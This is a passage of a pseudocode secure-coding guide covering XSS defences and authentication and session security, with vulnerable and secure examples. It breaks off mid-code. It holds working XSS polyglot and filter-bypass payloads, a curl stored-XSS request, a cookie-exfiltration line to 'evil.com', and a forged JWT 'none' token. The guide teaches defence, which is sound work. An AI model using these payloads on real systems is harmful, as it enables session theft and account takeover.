outside during parsing +// Can result in unexpected DOM structure + +// SECURE: Use battle-tested sanitizer with mXSS protection +function sanitizeHtml(html): + return DOMPurify.sanitize(html, { + // DOMPurify has mXSS protection built-in + USE_PROFILES: {html: true}, + // Optionally restrict further + FORBID_TAGS: ["style", "math", "svg"], + FORBID_ATTR: ["style"] + }) + +// BETTER: Avoid HTML sanitization when possible +function renderUserContent(content): + // If you only need formatted text, use markdown + markdownHtml = markdownToHtml(content) // Controlled conversion + return DOMPurify.sanitize(markdownHtml) +``` + +**Detection:** Test with: +- Malformed nesting (`
`) +- Namespace elements (``, ``, ``) +- Backticks and other unusual quote characters +- Processing instruction-like content (``) + +--- + +### Edge Case 2: Polyglot Payloads + +```pseudocode +// DANGEROUS: Payloads that work in multiple contexts + +// Polyglot XSS example: +payload = "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcLiCk=alert() )//%0D%0A%0d%0a//\\x3csVg/" + +// This payload attempts to work in: +// - JavaScript context (javascript: URL) +// - HTML attribute context (onclick) +// - Inside HTML comments +// - Inside style/title/textarea/script tags +// - SVG context + +// Why this matters: +// - Single payload tests multiple vectors +// - Fuzzy input handling might trigger in unexpected context +// - Copy-paste from "safe" context to unsafe context + +// SECURE: Context-specific encoding, not generic filtering +function outputToContext(value, context): + switch context: + case "html_body": + return htmlEncode(value) + case "html_attribute": + return attributeEncode(value) + case "javascript_string": + return jsStringEncode(value) + case "url_parameter": + return urlEncode(value) + case "css_value": + return cssEncode(value) + default: + throw Error("Unknown context: " + context) + +// Each encoder handles that specific context's dangerous characters +``` + +**Detection:** Use polyglot payloads in security testing to find context confusion vulnerabilities. + +--- + +### Edge Case 3: Encoding Bypass Techniques + +```pseudocode +// DANGEROUS: Incomplete encoding can be bypassed + +// Bypass 1: Case variation +// Filter checks: if "alert(1)" +// Browser: case-insensitive HTML parsing + +// Bypass 2: HTML entities in event handlers +// Filter: remove "javascript:" +// Input: "javascript:alert(1)" +// Browser decodes entities before processing + +// Bypass 3: Null bytes +// Input: "java\x00script:alert(1)" +// Some filters/WAFs don't handle null bytes +// Some browsers ignore them + +// Bypass 4: Overlong UTF-8 +// Normal '<': 0x3C +// Overlong: 0xC0 0xBC (invalid UTF-8, but some parsers accept) + +// Bypass 5: Mixed encoding +// Input: "%3Cscript%3Ealert(1)%3C/script%3E" +// If HTML-encoded before URL-decoded, double encoding attack + +// SECURE: Encode on output, not filter on input +function secureOutput(userInput, context): + // Don't try to filter/blocklist dangerous patterns + // DO encode appropriately for the output context + + // The encoding makes ALL user input safe + // regardless of what it contains + return encode(userInput, context) + +// SECURE: Canonicalize THEN validate +function processInput(input): + // 1. Decode all encoding layers + decoded = fullyDecode(input) // URL, HTML entities, etc. + + // 2. Normalize (lowercase, normalize unicode) + normalized = normalize(decoded) + + // 3. Validate against rules + if not isValid(normalized): + reject() + + // 4. Store normalized form + store(normalized) + + // 5. Encode on output (later) +``` + +**Key Insight:** Output encoding is more reliable than input filtering because you know the exact output context. + +--- + +### Edge Case 4: DOM Clobbering + +```pseudocode +// DANGEROUS: HTML elements can override JavaScript globals + +// How DOM clobbering works: +// Elements with id or name attributes create global variables +html = '' +// Now: window.alert === element +// alert(1) throws error instead of showing alert + +// Exploitable clobbering: +html = '' +// document.cookie might now reference the input element + +// Attack on sanitizer output: +html = '' +// If code does: location = document.getElementById(cid) +// Attacker controls the navigation + +// More dangerous patterns: +html = '
' +// x.y now references the input +// Chains allow deep property access + +// SECURE: Avoid global lookups for security-sensitive operations +function getConfigValue(key): + // DON'T: return window[key] + // DON'T: return document.getElementById(key).value + + // DO: Use a namespaced config object + return APP_CONFIG[key] + +// SECURE: Use unique prefixes for security-critical IDs +function getElementById(id): + // Prefix with app-specific namespace + return document.getElementById("app__" + id) + +// SECURE: Validate types after DOM queries +function getFormElement(id): + element = document.getElementById(id) + if element instanceof HTMLFormElement: + return element + throw Error("Expected form element") +``` + +**Detection:** Test with: +- Elements with IDs matching JavaScript globals (`alert`, `name`, `location`) +- Elements with names matching object properties (`cookie`, `domain`) +- Nested forms with chained name/id attributes + +--- + +## Common Mistakes Section + +### Mistake 1: Encoding Once, Using in Multiple Contexts + +```pseudocode +// DANGEROUS: Single encoding for multiple contexts + +function saveUserProfile(name, bio): + // Encoding once at input time + safeName = htmlEncode(name) + safeBio = htmlEncode(bio) + + database.save({name: safeName, bio: safeBio}) + +function displayProfile(user): + // HTML context - HTML encoding was correct + htmlOutput = "

" + user.name + "

" // OK + + // But JavaScript context needs different encoding! + jsOutput = "" + // If name contained single quotes: "O'Brien" -> already encoded as "O'Brien" + // Now in JS context, ' is literal text, not a quote escape + + // And URL context is wrong too! + urlOutput = "/profile?name=" + user.name + // HTML entities in URL don't encode properly + +// SECURE: Store raw data, encode on output +function saveUserProfile(name, bio): + // Store raw (unencoded) user input + database.save({name: name, bio: bio}) + +function displayProfile(user): + // Encode specifically for each output context + htmlName = htmlEncode(user.name) + jsName = jsStringEncode(user.name) + urlName = urlEncode(user.name) + + htmlOutput = "

" + htmlName + "

" + jsOutput = "" + urlOutput = "/profile?name=" + urlName +``` + +**Rule:** Store data raw. Encode at the point of output, specific to that context. + +--- + +### Mistake 2: Client-Side Only Sanitization + +```pseudocode +// DANGEROUS: Relying only on client-side protection + +// Client-side sanitization +function submitComment(comment): + // Sanitize before sending to server + cleanComment = DOMPurify.sanitize(comment) + fetch("/api/comments", { + method: "POST", + body: JSON.stringify({comment: cleanComment}) + }) + +// Problem: Attacker bypasses client-side code entirely +// Using curl, Postman, or modified browser +curlCommand = """ +curl -X POST https://site.com/api/comments \\ + -H "Content-Type: application/json" \\ + -d '{"comment": ""}' +""" + +// Server trusts the input because "client sanitized it" +function handleCommentApi(request): + comment = request.body.comment + database.saveComment(comment) // Stored XSS! + +// SECURE: Server-side sanitization is mandatory +function handleCommentApiSecure(request): + comment = request.body.comment + + // Server-side sanitization + cleanComment = serverSideSanitize(comment) + + database.saveComment(cleanComment) + +function displayComment(comment): + // Still encode on output (defense in depth) + return htmlEncode(comment) + +// NOTE: Client-side sanitization can still be useful for: +// - Preview functionality +// - Reducing server load +// - Better UX feedback +// But it must NEVER be the only protection +``` + +**Rule:** Server-side encoding/sanitization is mandatory. Client-side is optional enhancement. + +--- + +### Mistake 3: Blocklist Approaches + +```pseudocode +// DANGEROUS: Trying to block known-bad patterns + +function filterXss(input): + // Block list approach + dangerous = [ + "", + "javascript:", + "onerror", "onload", "onclick", + "alert", "eval", "document.cookie" + ] + + result = input + for pattern in dangerous: + result = result.replace(pattern, "") + + return result + +// Bypasses: +// 1. Case: "" +// 2. Encoding: "<script>alert(1)</script>" +// 3. Null bytes: "alert(1)" +// 4. Other events: "onmouseover", "onfocus", "onanimationend" +// 5. Other sinks: "fetch('http://evil.com/'+document.cookie)" +// 6. New features: Future HTML/JS features not in blocklist + +// DANGEROUS: Regex blocklist +function filterXssRegex(input): + // Still bypassable + if regex.match(/.*?<\/script>/i, input): + return "" + return input + +// Bypass: "ipt>alert(1)ipt>" +// After removal: "" + +// SECURE: Allowlist approach +function sanitizeUsername(input): + // Only allow expected characters + if regex.match(/^[a-zA-Z0-9_-]{1,30}$/, input): + return input + throw ValidationError("Invalid username") + +// SECURE: Proper encoding (makes blocklist unnecessary) +function displaySafely(input): + return htmlEncode(input) // All input is safe after encoding +``` + +**Rule:** Allowlist what's expected, or encode everything. Never blocklist dangerous patterns. + +--- + +### Mistake 4: Trusting Sanitization Libraries Blindly + +```pseudocode +// DANGEROUS: Assuming sanitization handles everything + +function processHtml(userHtml): + // "The library handles XSS" + clean = sanitizer.sanitize(userHtml) + + // But then using it unsafely: + // 1. Wrong context + return "" + // Sanitizer cleaned HTML context, not JavaScript context + + // 2. Double encoding + clean = sanitizer.sanitize(htmlEncode(userHtml)) + // Now clean contains encoded entities that might decode later + + // 3. Post-processing that reintroduces vulnerabilities + processed = clean.replace("[link]", "
link") + // Custom processing after sanitization can break safety + +// SECURE: Understand what the sanitizer does +function processHtmlSecure(userHtml): + // 1. Sanitize for HTML context + cleanHtml = DOMPurify.sanitize(userHtml, { + ALLOWED_TAGS: ["p", "b", "i", "a"], + ALLOWED_ATTR: ["href"] + }) + + // 2. Validate URLs in allowed href attributes + dom = parseHtml(cleanHtml) + for link in dom.querySelectorAll("a[href]"): + if not isValidUrl(link.href): + link.removeAttribute("href") + + // 3. Use only in HTML context + return cleanHtml + +// SECURE: For JavaScript context, don't use HTML sanitizer +function embedDataInJs(data): + // JSON encoding is the appropriate "sanitizer" for JSON/JS + return JSON.stringify(data) // Handles all escaping for JSON +``` + +**Rule:** Use the right encoding/sanitization for each context. Sanitizers are context-specific. + +--- + +## Framework-Specific Guidance (Pseudocode Patterns) + +### React Pattern + +```pseudocode +// React default: Auto-escaping in JSX +function UserProfile(props): + // SAFE: React escapes by default + return ( +
+

{props.username}

// Auto-escaped +

{props.bio}

// Auto-escaped +
+ ) + +// DANGEROUS: dangerouslySetInnerHTML bypasses protection +function RichContent(props): + // VULNERABLE if props.html is user-controlled + return
+ +// SECURE: Sanitize before using dangerouslySetInnerHTML +function RichContentSafe(props): + sanitizedHtml = DOMPurify.sanitize(props.html) + return
+ +// DANGEROUS: href with user input +function UserLink(props): + // VULNERABLE: javascript: URLs execute + return {props.text} + +// SECURE: Validate URL scheme +function UserLinkSafe(props): + url = props.url + if not url.startsWith("http://") and not url.startsWith("https://"): + url = "#" // Safe fallback + return {props.text} +``` + +--- + +### Vue Pattern + +```pseudocode +// Vue default: Auto-escaping with {{ }} + + +// DANGEROUS: v-html bypasses protection + + +// SECURE: Sanitize before v-html + + + +// DANGEROUS: Dynamic attribute binding + + +// SECURE: URL validation + +``` + +--- + +### Angular Pattern + +```pseudocode +// Angular default: Auto-sanitization +@Component({ + template: ` + +

{{ username }}

+

{{ bio }}

+ ` +}) + +// Angular [innerHTML] is semi-safe (Angular sanitizes) +@Component({ + template: ` + +
+ ` +}) + +// DANGEROUS: Bypassing sanitization +import { DomSanitizer } from '@angular/platform-browser' + +@Component({...}) +class MyComponent { + constructor(private sanitizer: DomSanitizer) {} + + // VULNERABLE: Bypasses Angular's sanitization + get unsafeHtml() { + return this.sanitizer.bypassSecurityTrustHtml(this.userInput) + } +} + +// SECURE: Let Angular sanitize, or use additional sanitizer +@Component({...}) +class MyComponentSafe { + get safeHtml() { + // Angular's default sanitization is usually sufficient + // For extra safety, pre-sanitize + return DOMPurify.sanitize(this.userInput) + } +} +``` + +--- + +### Server-Side Template Engines Pattern + +```pseudocode +// Jinja2 (Python) +// SAFE: Auto-escaping by default +

{{ username }}

+ +// DANGEROUS: |safe filter +
{{ user_html | safe }}
+ +// Handlebars +// SAFE: {{ }} escapes +

{{username}}

+ +// DANGEROUS: {{{ }}} triple braces +
{{{user_html}}}
+ +// EJS (Node.js) +// SAFE: <%= %> escapes +

<%= username %>

+ +// DANGEROUS: <%- %> raw +
<%- user_html %>
+ +// SECURE PATTERN: Always use escaping syntax, sanitize if HTML needed +// Jinja2 +
{{ user_html | sanitize }}
+ +// Handlebars +
{{sanitize user_html}}
+ +// EJS +
<%= sanitize(user_html) %>
+``` + +--- + +## Security Checklist + +- [ ] All user input rendered in HTML is HTML-encoded +- [ ] All user input in HTML attributes is attribute-encoded and quoted +- [ ] All user input in JavaScript strings is JavaScript-encoded +- [ ] All user input in URLs is URL-encoded (and scheme validated for links) +- [ ] All user input in CSS is CSS-encoded or allowlist-validated +- [ ] `innerHTML`, `document.write`, and similar are avoided or use sanitized input +- [ ] `textContent` is used instead of `innerHTML` where possible +- [ ] `dangerouslySetInnerHTML`, `v-html`, `|safe` etc. only used with sanitized content +- [ ] URL schemes are validated (allow only http/https, not javascript:) +- [ ] Server-side encoding/sanitization is implemented (not just client-side) +- [ ] Encoding is performed at output time, specific to each context +- [ ] HTML sanitizer (DOMPurify) is used when rich HTML input is required +- [ ] Content Security Policy (CSP) headers are implemented +- [ ] X-XSS-Protection and X-Content-Type-Options headers are set +- [ ] Cookie HttpOnly flag is set to prevent JavaScript access +- [ ] No user input reaches eval(), new Function(), or setTimeout with strings +- [ ] Framework auto-escaping is enabled and not bypassed + +--- + +# Pattern 4: Authentication and Session Security + +**CWE References:** CWE-287 (Improper Authentication), CWE-384 (Session Fixation), CWE-613 (Insufficient Session Expiration), CWE-307 (Improper Restriction of Excessive Authentication Attempts), CWE-308 (Use of Single-factor Authentication), CWE-640 (Weak Password Recovery Mechanism), CWE-1275 (Sensitive Cookie with Improper SameSite Attribute) + +**Priority Score:** 22 (Frequency: 8, Severity: 9, Detectability: 5) + +--- + +## Introduction: High Complexity Leads to High AI Error Rate + +Authentication and session management represent one of the most complex security domains in application development. AI models struggle particularly with these patterns for several interconnected reasons: + +**Why AI Models Generate Insecure Authentication Code:** + +1. **Complexity Breeds Shortcuts:** Authentication requires coordinating multiple components—password storage, session management, token generation, cookie handling, and logout procedures. AI models often generate "working" code that skips essential security layers for simplicity. + +2. **Tutorial Syndrome:** Training data is saturated with simplified authentication tutorials designed to teach concepts, not build production systems. These tutorials often omit rate limiting, secure token generation, proper session invalidation, and timing attack prevention. + +3. **JWT Misunderstandings:** JSON Web Tokens have become the default recommendation, but AI models frequently generate JWT implementations with critical flaws—the "none" algorithm vulnerability, weak secrets, improper validation, and insecure storage. + +4. **Framework Diversity:** Authentication patterns vary dramatically across frameworks (Passport.js, Spring Security, Django, Rails Devise, etc.). AI models conflate patterns between frameworks, generating hybrid code that's neither correct for any framework nor secure. + +5. **Stateless vs. Stateful Confusion:** The shift toward stateless authentication (JWTs) has created mixed patterns in training data. AI often combines stateless token concepts with stateful session assumptions, creating logical gaps in security. + +6. **Edge Case Blindness:** Authentication edge cases—concurrent sessions, password reset flows, account recovery, MFA, and OAuth state management—require deep security thinking that AI models cannot reliably produce. + +**Impact Statistics:** + +- **75.8%** of developers believe AI-generated authentication code is secure (Snyk State of AI Security Survey 2024) +- **63%** of data breaches involve weak, default, or stolen credentials (Verizon DBIR 2024) +- Authentication bypasses represent **41%** of critical vulnerabilities in web applications (HackerOne Report) +- Average cost of a credential-stuffing breach: **$4.3 million** (Ponemon Institute) +- Only **23%** of AI-generated authentication code properly implements session invalidation on logout + +--- + +## BAD Examples: Multiple Manifestations + +### BAD Example 1: Weak Password Validation + +```pseudocode +// VULNERABLE: Minimal password requirements +function validatePassword(password): + if length(password) < 6: + return false + return true + +// VULNERABLE: Only checks length, no complexity +function registerUser(email, password): + if length(password) >= 8: // "Strong enough" + hashedPassword = hashPassword(password) + createUser(email, hashedPassword) + return success + return error("Password too short") + +// VULNERABLE: Pattern allows easy-to-guess passwords +function isValidPassword(password): + // Only requires one of each - easily satisfied by "Password1!" + hasUpper = containsUppercase(password) + hasLower = containsLowercase(password) + hasNumber = containsNumber(password) + hasSpecial = containsSpecialChar(password) + + if hasUpper and hasLower and hasNumber and hasSpecial: + return true + return false + // Missing: dictionary check, common password check, breach check +``` + +**Why This Is Dangerous:** +- Allows passwords like "123456", "password", or "qwerty123" +- No protection against common password lists +- No check against known breached passwords (Have I Been Pwned) +- Pattern requirements are easily satisfied by predictable passwords ("Password1!") +- Attackers can crack weak passwords in seconds with modern hardware + +--- + +### BAD Example 2: Predictable Session Tokens + +```pseudocode +// VULNERABLE: Sequential session IDs +sessionCounter = 1000 + +function generateSessionId(): + sessionCounter = sessionCounter + 1 + return "session_" + toString(sessionCounter) + +// VULNERABLE: Time-based session generation +function createSessionToken(): + timestamp = getCurrentTimestamp() + return "sess_" + toString(timestamp) + +// VULNERABLE: Weak random source +function generateToken(): + return "token_" + toString(randomInteger(0, 999999)) + +// VULNERABLE: MD5 of predictable data +function createAuthToken(userId): + timestamp = getCurrentTimestamp() + return md5(toString(userId) + toString(timestamp)) + +// VULNERABLE: User-controlled seed +function generateSessionId(userId, email): + seed = userId + email + getCurrentDate() + return sha256(seed) // Deterministic - same inputs = same output +``` + +**Why This Is Dangerous:** +- Sequential IDs allow session enumeration—attacker can guess valid sessions +- Timestamp-based tokens can be predicted if attacker knows approximate creation time +- Weak random (Math.random, random.randint) is predictable with statistical analysis +- MD5 is fast to compute, enabling brute-force attacks +- User-controlled inputs in token generation allow attackers to predict tokens + +--- + +### BAD Example 3: Session Fixation Vulnerabilities + +```pseudocode +// VULNERABLE: Session ID not regenerated after login +function login(request): + email = request.body.email + password = request.body.password + + user = findUserByEmail(email) + if user and verifyPassword(password, user.hashedPassword): + // Using the SAME session ID from before authentication + request.session.userId = user.id + request.session.authenticated = true + return redirect("/dashboard") + return error("Invalid credentials") + +// VULNERABLE: Accepting session ID from URL parameter +function handleRequest(request): + sessionId = request.query.sessionId or request.cookies.sessionId + // Attacker can send victim: https://app.com/login?sessionId=attacker_controlled_session + session = loadSession(sessionId) + +// VULNERABLE: Not invalidating session on privilege change +function promoteToAdmin(request): + user = getCurrentUser(request) + user.role = "admin" + user.save() + // Same session continues - if session was compromised before, + // attacker now has admin access + return success("You are now an admin") +``` + +**Why This Is Dangerous:** +- Attacker sets session ID → victim logs in → attacker uses same session ID with victim's authenticated session +- URL-based session IDs can be logged in server logs, browser history, referrer headers +- Privilege escalation without session regeneration means compromised sessions gain elevated access + +--- + +### BAD Example 4: JWT "none" Algorithm Acceptance + +```pseudocode +// VULNERABLE: Decoding JWT without algorithm verification +function verifyJwt(token): + parts = token.split(".") + header = base64Decode(parts[0]) + payload = base64Decode(parts[1]) + + // Trusting the algorithm from the token header itself! + algorithm = header.alg + + if algorithm == "none": + return payload // No signature check! + + signature = parts[2] + if verifySignature(payload, signature, algorithm): + return payload + return null + +// VULNERABLE: Using jwt library without specifying expected algorithm +function validateToken(token): + try: + // Library may accept 'none' algorithm if token specifies it + decoded = jwt.decode(token, secretKey) + return decoded + catch: + return null + +// VULNERABLE: Allowing multiple algorithms including none +function verifyToken(token, secret): + options = { + algorithms: ["HS256", "HS384", "HS512", "none"] // DANGEROUS + } + return jwt.verify(token, secret, options) +``` + +**Why This Is Dangerous:** +- Attacker modifies JWT header to specify `alg: "none"` and removes signature +- Server accepts unsigned token as valid +- This vulnerability has affected major JWT libraries across multiple languages +- Complete authentication bypass—attacker can impersonate any user + +**Exploit Example:** +```pseudocode +// Original legitimate token: +// Header: {"alg":"HS256","typ":"JWT"} +// Payload: {"sub":"1234","role":"user"} +// Signature: valid_signature_here + +// Attacker-modified token: +// Header: {"alg":"none","typ":"JWT"} ← Changed to "none" +// Payload: {"sub":"1234","role":"admin"} ← Changed to admin +// Signature: (empty) ← Removed + +// If server trusts header.alg, this forged token is accepted as valid +``` + +--- + +### BAD Example 5: Weak JWT Secrets + +```pseudocode +// VULNERABLE: Short/guessable secret +JWT_SECRET = "secret" + +// VULNERABLE: Common secrets from tutorials +JWT_SECRET = "your-256-bit-secret" +JWT_SECRET = "supersecretkey" +JWT_SECRET = "jwt-secret-key" + +// VULNERABLE: Empty or null secret +function createToken(payload): + secret = getConfig("JWT_SECRET") or "" // Falls back to empty string + return jwt.sign(payload, secret, {algorithm: "HS256"}) + +// VULNERABLE: Secret derived from predictable data +function getJwtSecret(): + return sha256(APPLICATION_NAME + "-" + ENVIRONMENT) + // If attacker knows app name and environment, they can derive the secret + +// VULNERABLE: Same secret for signing and encryption +JWT_SECRET = "shared_secret_for_everything" +function signToken(payload): + return jwt.sign(payload, JWT_SECRET) +function encryptData(data): + return aesEncrypt(data, JWT_SECRET) // Key reuse vulnerability +``` + +**Why This Is Dangerous:** +- Weak secrets can be brute-forced or found in wordlists +- Common tutorial secrets are in public databases of JWT secrets +- Empty secrets may be accepted by some JWT libraries +- Secret compromise allows forging any JWT—complete authentication bypass +- Key reuse across different cryptographic operations violates security principles + +--- + +### BAD Example 6: Token Storage in localStorage + +```pseudocode +// VULNERABLE: Storing JWT in localStorage +function handleLoginResponse(response): + accessToken = response.data.accessToken + refreshToken = response.data.refreshToken + + // localStorage is accessible to ANY JavaScript on the page + localStorage.setItem("access_token", accessToken) + localStorage.setItem("refresh_token", refreshToken) + + // Also stored user data in localStorage + localStorage.setItem("user", JSON.stringify(response.data.user)) + +// VULNERABLE: Retrieving token for API calls +function apiRequest(endpoint, data): + token = localStorage.getItem("access_token") + return fetch(endpoint, { + headers: { + "Authorization": "Bearer " + token + }, + body: JSON.stringify(data) + }) + +// VULNERABLE: Token in sessionStorage (same problem) +function storeToken(token): + sessionStorage.setItem("jwt", token) +``` + +**Why This Is Dangerous:** +- localStorage is accessible to any JavaScript running on the page +- XSS vulnerability = complete authentication compromise +- Tokens persist across browser sessions (localStorage) +- No protection against browser extensions reading storage +- Refresh tokens in localStorage allow long-term account takeover + +--- + +### BAD Example 7: Missing Token Expiration + +```pseudocode +// VULNERABLE: JWT without expiration +function createUserToken(user): + payload = { + userId: user.id, + email: user.email, + role: user.role + // No "exp" claim! + } + return jwt.sign(payload, JWT_SECRET) + +// VULNERABLE: Extremely long expiration +function generateToken(user): + payload = { + sub: user.id, + iat: now(), + exp: now() + (365 * 24 * 60 * 60) // 1 year expiration + } + return jwt.sign(payload, JWT_SECRET) + +// VULNERABLE: Trusting token-provided expiration without server check +function validateToken(token): + decoded = jwt.verify(token, JWT_SECRET) + // JWT library checks exp, but server has no session to revoke + // Compromised tokens valid until natural expiration + return decoded + +// VULNERABLE: No mechanism to invalidate tokens +function logout(request): + response.clearCookie("token") + return success("Logged out") + // Token is still valid! Anyone with the token can still use it +``` + +**Why This Is Dangerous:** +- Tokens without expiration are valid forever if secret isn't changed +- Long-lived tokens give attackers extended exploitation windows +- No server-side invalidation means compromised tokens can't be revoked +- Logout only removes token from client but doesn't invalidate it +- Stolen tokens remain valid even after password change + +--- + +## GOOD Examples: Secure Authentication Patterns + +### GOOD Example 1: Strong Password Requirements Pattern + +```pseudocode +// SECURE: Comprehensive password validation +import commonPasswordList from "common-passwords-database" +import breachedPasswordApi from "haveibeenpwned-api" + +function validatePasswordStrength(password): + errors = [] + + // Minimum length (NIST recommends 8+, many orgs use 12+) + if length(password) < 12: + errors.push("Password must be at least 12 characters") + + // Maximum length (prevent DoS from hashing extremely long passwords) + if length(password) > 128: + errors.push("Password cannot exceed 128 characters") + + // Check against common password list (10,000+ passwords) + if password.toLowerCase() in commonPasswordList: + errors.push("This password is too common") + + // Check against user-specific data (optional but recommended) + // - Don't allow email prefix as password + // - Don't allow username as password + + // Check against breached passwords (Have I Been Pwned API) + if await checkBreachedPassword(password): + errors.push("This password has appeared in a data breach") + + if length(errors) > 0: + return { valid: false, errors: errors } + + return { valid: true, errors: [] } + +// SECURE: Check breached passwords using k-anonymity (no password exposure) +async function checkBreachedPassword(password): + // Hash password with SHA-1 (HIBP API requirement) + hash = sha1(password).toUpperCase() + prefix = hash.substring(0, 5) + suffix = hash.substring(5) + + // Only send first 5 characters - k-anonymity preserves privacy + response = await fetch("https://api.pwnedpasswords.com/range/" + prefix) + hashes = response.text() + + // Check if our suffix appears in the returned hashes + for line in hashes.split("\n"): + parts = line.split(":") + if parts[0] == suffix: + return true // Password has been breached + + return false + +// SECURE: Password hashing with proper algorithm +function hashPassword(password): + // bcrypt with cost factor of 12 (adjust based on hardware) + // Alternatively: argon2id with recommended parameters + return bcrypt.hash(password, 12) + +function verifyPassword(password, hash): + return bcrypt.compare(password, hash) +``` + +**Why This Is Secure:** +- Length requirements block trivially short passwords +- Common password checking blocks dictionary attacks +- Breach checking prevents credential stuffing from known breaches +- k-anonymity ensures password isn't exposed during breach check +- bcrypt/argon2 provides proper password hashing with work factor + +--- + +### GOOD Example 2: Secure Session Generation + +```pseudocode +// SECURE: Cryptographically random session IDs +import cryptoRandom from "secure-random-library" + +function generateSessionId(): + // 256 bits of cryptographically secure randomness + // Represented as 64 hex characters + randomBytes = cryptoRandom.getRandomBytes(32) + return bytesToHex(randomBytes) + +// SECURE: Session creation with proper attributes +function createSession(userId): + sessionId = generateSessionId() + + sessionData = { + id: sessionId, + userId: userId, + createdAt: now(), + expiresAt: now() + SESSION_DURATION, // e.g., 24 hours + lastActivityAt: now(), + ipAddress: getClientIP(), + userAgent: getUserAgent() + } + + // Store in server-side session store (Redis, database, etc.) + sessionStore.save(sessionId, sessionData) + + return sessionId + +// SECURE: Session ID regeneration after authentication +function login(request): + email = request.body.email + password = request.body.password + + user = findUserByEmail(email) + if not user: + return error("Invalid credentials") // Don't reveal if email exists + + if not verifyPassword(password, user.hashedPassword): + recordFailedLogin(user.id, getClientIP()) + return error("Invalid credentials") + + // CRITICAL: Destroy old session and create new one + if request.session.id: + sessionStore.delete(request.session.id) + + // Generate completely new session ID after authentication + newSessionId = createSession(user.id) + + // Set session cookie with secure attributes + response.setCookie("session_id", newSessionId, { + httpOnly: true, // Prevent XSS access + secure: true, // HTTPS only + sameSite: "Strict", // CSRF protection + path: "/", + maxAge: SESSION_DURATION + }) + + return redirect("/dashboard") + +// SECURE: Session regeneration on privilege change +function changeUserRole(request, newRole): + user = getCurrentUser(request) + + // Change the role + user.role = newRole + user.save() + + // Regenerate session to bind new privileges to fresh session + oldSessionId = request.cookies.session_id + sessionStore.delete(oldSessionId) + + newSessionId = createSession(user.id) + + response.setCookie("session_id", newSessionId, { + httpOnly: true, + secure: true, + sameSite: "Strict" + }) + + return success("Role updated") +``` + +**Why This Is Secure:** +- Cryptographically random session IDs prevent prediction/enumeration +- Session regeneration after login prevents session fixation +- Privilege changes trigger session regeneration +- Secure cookie attributes prevent common attack vectors +- Server-side session storage allows proper invalidation + +--- + +### GOOD Example 3: Proper JWT Validation + +```pseudocode +// SECURE: JWT configuration with strict settings +JWT_CONFIG = { + secret: getEnv("JWT_SECRET"), // 256+ bit secret from environment + algorithms: ["HS256"], // Single allowed algorithm - explicit! + issuer: "myapp.example.com", + audience: "myapp-users", + expiresIn: "15m" // Short-lived access tokens +} + +// SECURE: Token creation with explicit claims +function createAccessToken(user): + payload = { + sub: toString(user.id), + email: user.email, + role: user.role, + iss: JWT_CONFIG.issuer, + aud: JWT_CONFIG.audience, + iat: now(), + exp: now() + (15 * 60), // 15 minutes + jti: generateUUID() // Unique token ID for revocation + } + + return jwt.sign(payload, JWT_CONFIG.secret, { + algorithm: "HS256" // Explicit algorithm + }) + +// SECURE: Token verification with all claims checked +function verifyAccessToken(token): + try: + decoded = jwt.verify(token, JWT_CONFIG.secret, { + algorithms: ["HS256"], // ONLY accept HS256 + issuer: JWT_CONFIG.issuer, + audience: JWT_CONFIG.audience, + complete: true // Return header + payload + }) + + // Additional validation + if not decoded.payload.sub: + return { valid: false, error: "Missing subject" } + + if not decoded.payload.role: + return { valid: false, error: "Missing role" } + + // Check against token blacklist (for logout/revocation) + if await isTokenRevoked(decoded.payload.jti): + return { valid: false, error: "Token revoked" } + + return { valid: true, payload: decoded.payload } + + catch JwtExpiredError: + return { valid: false, error: "Token expired" } + catch JwtInvalidError as e: + return { valid: false, error: "Invalid token: " + e.message } + +// SECURE: Refresh token handling +function createRefreshToken(user, sessionId): + payload = { + sub: toString(user.id), + sid: sessionId, // Bind to session for revocation + type: "refresh", + iat: now(), + exp: now() + (7 * 24 * 60 * 60) // 7 days + } + + token = jwt.sign(payload, JWT_CONFIG.secret + "_refresh", { + algorithm: "HS256" + }) + + // Store refresh token hash in database for revocation + tokenHash = sha256(token) + storeRefreshToken(user.id, sessionId, tokenHash, payload.exp) + + return token + +// SECURE: Refresh flow with rotation +function refreshAccessToken(refreshToken): + try: + decoded = jwt.verify(refreshToken, JWT_CONFIG.secret + "_refresh", { + algorithms: ["HS256"] + }) + + // Verify refresh token is still valid in database + tokenHash = sha256(refreshToken) + storedToken = getRefreshToken(decoded.sub, tokenHash) + + if not storedToken or storedToken.revoked: + return { error: "Refresh token invalid or revoked" } + + // Rotate refresh token (issue new one, revoke old) + revokeRefreshToken(tokenHash) + + user = findUserById(decoded.sub) + newAccessToken = createAccessToken(user) + newRefreshToken = createRefreshToken(user, decoded.sid) + + return { + accessToken: newAccessToken, + refreshToken: newRefreshToken + } + + catch: + return { error: "Invalid refresh token" } +``` + +**Why This Is Secure:** +- Explicit algorithm specification prevents algorithm confusion attacks +- Short-lived access tokens minimize exposure window +- JTI (JWT ID) enables token revocation +- Refresh token rotation limits reuse attacks +- Complete claim validation (iss, aud, exp, sub) +- Separate secrets for access and refresh tokens + +--- + +### GOOD Example 4: HttpOnly Secure Cookie Usage + +```pseudocode +// SECURE: Cookie-based session with proper attributes +function setSessionCookie(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, // Cannot be accessed via JavaScript + secure: true, // Only sent over HTTPS + sameSite: "Strict", // Not sent with cross-site requests + path: "/", // Available for all paths + domain: ".myapp.com", // Scoped to main domain and subdomains + maxAge: 24 * 60 * 60 // 24 hours in seconds + }) + +// SECURE: JWT in cookie (not localStorage) +function setAuthCookies(response, accessToken, refreshToken): + // Access token - short lived, same-site strict + response.setCookie("access_token", accessToken, { + httpOnly: true, + secure: true, + sameSite: "Strict", + path: "/", + maxAge: 15 * 60 // 15 minutes + }) + + // Refresh token - limited path to reduce exposure + response.setCookie("refresh_token", refreshToken, { + httpOnly: true, + secure: true, + sameSite: "Strict", + path: "/auth/refresh", // Only sent to refresh endpoint + maxAge: 7 * 24 * 60 * 60 // 7 days + }) + +// SECURE: Cookie cleanup on logout +function clearAuthCookies(response): + // Set cookies with immediate expiration + response.setCookie("access_token", "", { + httpOnly: true, + secure: true, + sameSite: "Strict", + path: "/", + maxAge: 0 // Immediate expiration + }) + + response.setCookie("refresh_token", "", { + httpOnly: true, + secure: true, + sameSite: "Strict", + path: "/auth/refresh", + maxAge: 0 + }) + +// SECURE: SameSite considerations for cross-origin needs +function setCookieForOAuth(response, stateToken): + // OAuth requires cookies to work across redirects + // Use Lax instead of Strict when necessary + response.setCookie("oauth_state", stateToken, { + httpOnly: true, + secure: true, + sameSite: 